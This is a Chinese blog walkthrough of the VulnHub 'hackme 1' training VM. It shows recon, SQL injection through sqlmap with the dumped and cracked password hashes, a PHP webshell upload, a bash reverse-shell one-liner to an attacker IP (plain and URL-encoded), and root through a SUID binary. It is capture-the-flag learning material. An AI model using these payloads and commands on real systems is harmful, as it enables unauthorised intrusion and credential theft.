首页 > 其他分享 >Walkthrough-hackme 1

Walkthrough-hackme 1

时间:2023-06-05 13:56:41浏览次数:48  
标签:INFO bin 01 16 Walkthrough usr snap hackme

0x01 环境

靶机地址:
https://www.vulnhub.com/entry/hackme-1,330/

0x02 过程

1.信息收集

┌──(root㉿kali)-[/home/kali]
└─# netdiscover -r 192.168.60.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                             
                                                                                                                           
 12 Captured ARP Req/Rep packets, from 11 hosts.   Total size: 720                                                         
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.60.82   00:0c:29:58:40:86      1      60  VMware, Inc.                                                            

发现IP:192.168.60.82

端口开放情况

┌──(root㉿kali)-[/home/kali]
└─# nmap --min-rate 10000 -p- 192.168.60.82                
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 04:57 EDT
Nmap scan report for hackme (192.168.60.82)
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:58:40:86 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.48 seconds

2.思路

打开80端口,发现可以注册
image

随意注册一个账号,进入发现搜索书籍功能,进而发现sql注入
image

image

sqlmap跑出账号密码

┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# sqlmap -r 1 --batch --dbs
        ___
       __H__                                                                                                                 
 ___ ___[']_____ ___ ___  {1.7.2#stable}                                                                                     
|_ -| . [,]     | .'| . |                                                                                                    
|___|_  [.]_|_|_|__,|  _|                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:16:21 /2023-06-05/

[01:16:21] [INFO] parsing HTTP request from '1'
[01:16:21] [INFO] testing connection to the target URL
[01:16:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[01:16:21] [INFO] testing if the target URL content is stable
[01:16:22] [INFO] target URL content is stable
[01:16:22] [INFO] testing if POST parameter 'search' is dynamic
[01:16:22] [INFO] POST parameter 'search' appears to be dynamic
[01:16:22] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[01:16:22] [INFO] testing for SQL injection on POST parameter 'search'
[01:16:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:16:22] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[01:16:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[01:16:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:16:22] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[01:16:22] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:16:22] [INFO] testing 'Generic inline queries'
[01:16:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[01:16:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[01:16:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[01:16:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[01:16:32] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[01:16:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:16:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[01:16:32] [INFO] target URL appears to be UNION injectable with 3 columns
[01:16:32] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=cissp' AND (SELECT 6670 FROM (SELECT(SLEEP(5)))dQSX) AND 'YClZ'='YClZ

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=cissp' UNION ALL SELECT NULL,NULL,CONCAT(0x7171707a71,0x71457a72417551616b4f6a6a546744644658514651734a474a564f79466f72536550434e4f697068,0x717a6a7671)-- -
---
[01:16:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[01:16:32] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapphacking

[01:16:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.60.82'

[*] ending @ 01:16:32 /2023-06-05/

                                                                                                                             
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# sqlmap -r 1 --batch -D webapphacking --tables             
        ___
       __H__                                                                                                                 
 ___ ___[.]_____ ___ ___  {1.7.2#stable}                                                                                     
|_ -| . ["]     | .'| . |                                                                                                    
|___|_  ["]_|_|_|__,|  _|                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:16:49 /2023-06-05/

[01:16:49] [INFO] parsing HTTP request from '1'
[01:16:49] [INFO] resuming back-end DBMS 'mysql' 
[01:16:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=cissp' AND (SELECT 6670 FROM (SELECT(SLEEP(5)))dQSX) AND 'YClZ'='YClZ

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=cissp' UNION ALL SELECT NULL,NULL,CONCAT(0x7171707a71,0x71457a72417551616b4f6a6a546744644658514651734a474a564f79466f72536550434e4f697068,0x717a6a7671)-- -
---
[01:16:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[01:16:49] [INFO] fetching tables for database: 'webapphacking'
Database: webapphacking
[2 tables]
+-------+
| books |
| users |
+-------+

[01:16:49] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.60.82'

[*] ending @ 01:16:49 /2023-06-05/

                                                                                                                             
┌──(root㉿kali)-[/home/kali/Desktop/oscp]
└─# sqlmap -r 1 --batch -D webapphacking -T users --dump
        ___
       __H__                                                                                                                 
 ___ ___[']_____ ___ ___  {1.7.2#stable}                                                                                     
|_ -| . ["]     | .'| . |                                                                                                    
|___|_  [']_|_|_|__,|  _|                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:16:58 /2023-06-05/

[01:16:58] [INFO] parsing HTTP request from '1'
[01:16:58] [INFO] resuming back-end DBMS 'mysql' 
[01:16:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=cissp' AND (SELECT 6670 FROM (SELECT(SLEEP(5)))dQSX) AND 'YClZ'='YClZ

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: search=cissp' UNION ALL SELECT NULL,NULL,CONCAT(0x7171707a71,0x71457a72417551616b4f6a6a546744644658514651734a474a564f79466f72536550434e4f697068,0x717a6a7671)-- -
---
[01:16:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.10 (cosmic)
web application technology: Apache 2.4.34
back-end DBMS: MySQL >= 5.0.12
[01:16:58] [INFO] fetching columns for table 'users' in database 'webapphacking'
[01:16:58] [INFO] fetching entries for table 'users' in database 'webapphacking'
[01:16:58] [INFO] recognized possible password hashes in column 'pasword'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[01:16:58] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[01:16:58] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[01:16:58] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[01:16:58] [INFO] starting 4 processes 
[01:16:59] [INFO] cracked password '123456' for hash 'e10adc3949ba59abbe56e057f20f883e'                                     
[01:17:00] [INFO] cracked password 'commando' for hash '6269c4f71a55b24bad0f0267d9be5508'                                   
[01:17:00] [INFO] cracked password 'hello' for hash '5d41402abc4b2a76b9719d911017c592'                                      
[01:17:01] [INFO] cracked password 'p@ssw0rd' for hash '0f359740bd1cda994f8b55330c86d845'                                   
[01:17:02] [INFO] cracked password 'testtest' for hash '05a671c66aefea124cc08b76ea6d30bb'                                   
Database: webapphacking                                                                                                     
Table: users
[7 entries]
+----+--------------+------------+----------------+---------------------------------------------+
| id | name         | user       | address        | pasword                                     |
+----+--------------+------------+----------------+---------------------------------------------+
| 1  | David        | user1      | Newton Circles | 5d41402abc4b2a76b9719d911017c592 (hello)    |
| 2  | Beckham      | user2      | Kensington     | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| 3  | anonymous    | user3      | anonymous      | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| 10 | testismyname | test       | testaddress    | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 11 | superadmin   | superadmin | superadmin     | 2386acb2cf356944177746fc92523983            |
| 12 | test1        | test1      | test1          | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 13 | aa           | bb         | aa             | e10adc3949ba59abbe56e057f20f883e (123456)   |
+----+--------------+------------+----------------+---------------------------------------------+

[01:17:05] [INFO] table 'webapphacking.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.60.82/dump/webapphacking/users.csv'                                                                                                            
[01:17:05] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.60.82'

[*] ending @ 01:17:05 /2023-06-05/

                                  

将hash拿到在线解密网站解密为:

2386acb2cf356944177746fc92523983
Uncrackable

image

登录superadmin账号,发现文件上传功能
image

上传php一句话
image

image

反弹shell

bash -c "/bin/sh -i >& /dev/tcp/192.168.60.45/8080 0>&1"
%62%61%73%68%20%2D%63%20%22%2F%62%69%6E%2F%73%68%20%2D%69%20%3E%26%20%2F%64%65%76%2F%74%63%70%2F%31%39%32%2E%31%36%38%2E%36%30%2E%34%35%2F%38%30%38%30%20%30%3E%26%31%22

获得反弹shell

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 8080
listening on [any] 8080 ...
connect to [192.168.60.45] from (UNKNOWN) [192.168.60.82] 54692
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

提权过程

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@hackme:/var/www/html/uploads$ find / -user root -perm -4000 -print 2>/dev/null
<s$ find / -user root -perm -4000 -print 2>/dev/null
/snap/core/14946/bin/mount
/snap/core/14946/bin/ping
/snap/core/14946/bin/ping6
/snap/core/14946/bin/su
/snap/core/14946/bin/umount
/snap/core/14946/usr/bin/chfn
/snap/core/14946/usr/bin/chsh
/snap/core/14946/usr/bin/gpasswd
/snap/core/14946/usr/bin/newgrp
/snap/core/14946/usr/bin/passwd
/snap/core/14946/usr/bin/sudo
/snap/core/14946/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/14946/usr/lib/openssh/ssh-keysign
/snap/core/14946/usr/lib/snapd/snap-confine
/snap/core/14946/usr/sbin/pppd
/snap/core22/634/usr/bin/chfn
/snap/core22/634/usr/bin/chsh
/snap/core22/634/usr/bin/gpasswd
/snap/core22/634/usr/bin/mount
/snap/core22/634/usr/bin/newgrp
/snap/core22/634/usr/bin/passwd
/snap/core22/634/usr/bin/su
/snap/core22/634/usr/bin/sudo
/snap/core22/634/usr/bin/umount
/snap/core22/634/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/634/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/home/legacy/touchmenot
/bin/mount
/bin/umount
/bin/ping
/bin/ntfs-3g
/bin/su
/bin/fusermount
www-data@hackme:/var/www/html/uploads$ /home/legacy/touchmenot
/home/legacy/touchmenot
root@hackme:/var/www/html/uploads# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
root@hackme:/var/www/html/uploads# whoami
whoami
root
root@hackme:/var/www/html/uploads# 

发现特殊的suid,运行发现直接提权到root

标签:INFO,bin,01,16,Walkthrough,usr,snap,hackme
From: https://www.cnblogs.com/jarwu/p/17452382.html

相关文章

  • Walkthrough-SolidState 1
    0x01环境靶机地址:https://www.vulnhub.com/entry/solidstate-1,261/0x02过程1.信息收集┌──(root㉿kali)-[/home/kali/Desktop/oscp]└─#netdiscover-r192.168.60.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts......
  • Walkthrough-TR0LL 1
    0x01环境靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/该靶机偏CTF0x02过程1.信息收集┌──(root㉿kali)-[/home/kali/Desktop/oscp]└─#netdiscover-r192.168.60.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts......
  • Walkthrough-WINTERMUTE 1
    0x01环境靶机地址:https://www.vulnhub.com/entry/wintermute-1,239/两个靶机,做网络隔离STRAYLIGHT一张网卡桥接,另一张仅主机模式,桥接网卡时,可能有点问题,重选一下网卡就好了Kali做桥接网卡NEUROMANCER仅主机kali和NEUROMANCER网络不联通0x02过程STRAYLIGHT1.信息收......
  • Vulnhub Fall Walkthrough
    Recon二层本地扫描,发现目标靶机。┌──(kali㉿kali)-[~]└─$sudonetdiscover-r192.168.80.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts4CapturedARPReq/Rep......
  • Vulnhub Joy Walkthrough
    Recon这台靶机对枚举的要求较高,如果枚举不出有用的信息可能无法进一步展开,我们首先进行普通的扫描。┌──(kali㉿kali)-[~/Labs/Joy/80]└─$sudonmap-sS-sV-p-192.168.80.136StartingNmap7.93(https://nmap.org)at2023-04-1022:42EDTNmapscanreportfor......
  • Vulnhub Development Walkthrough
    VulnhubDevelopmentWalkthroughRecon首先使用netdiscover进行二层Arp扫描。┌──(kali㉿kali)-[~]└─$sudonetdiscover-r192.168.80.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts5CapturedARPReq/Reppackets,from5hosts.Total......
  • Walkthrough-SICKOS 1.2
    0x01环境靶机地址:https://www.vulnhub.com/entry/sickos-12,144/靶机用VMware打开;virtualbox有点麻烦,参考靶机地址进行配置。0x02过程1.信息收集┌──(root㉿kali)-[/home/kali/Desktop/tmp]└─#netdiscover-r192.168.60.1/24Currentlyscanning:Finished!|......
  • Vulnhub Bravery靶机 Walkthrough
    BraveryRecon使用netdiscover对本地网络进行arp扫描。┌──(kali㉿kali)-[~]└─$sudonetdiscover-r192.168.80.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts5......
  • Vulnhub:Hackme:1靶机
    kali:192.168.111.111靶机:192.168.111.245信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.245访问目标80端口,注册用户登陆后在搜索框位置存在sql注入漏洞利用利用sqlmap获得目标数据库信息sqlmap-o-r./a.txt--batch--level5--risk3......
  • Walkthrough-KIOPTRIX 2014
    0x01环境靶机地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/靶机默认网卡有点问题,移除网卡再新增网卡即可环境容易崩溃,崩溃了重启就好0x02过程1.信息收集......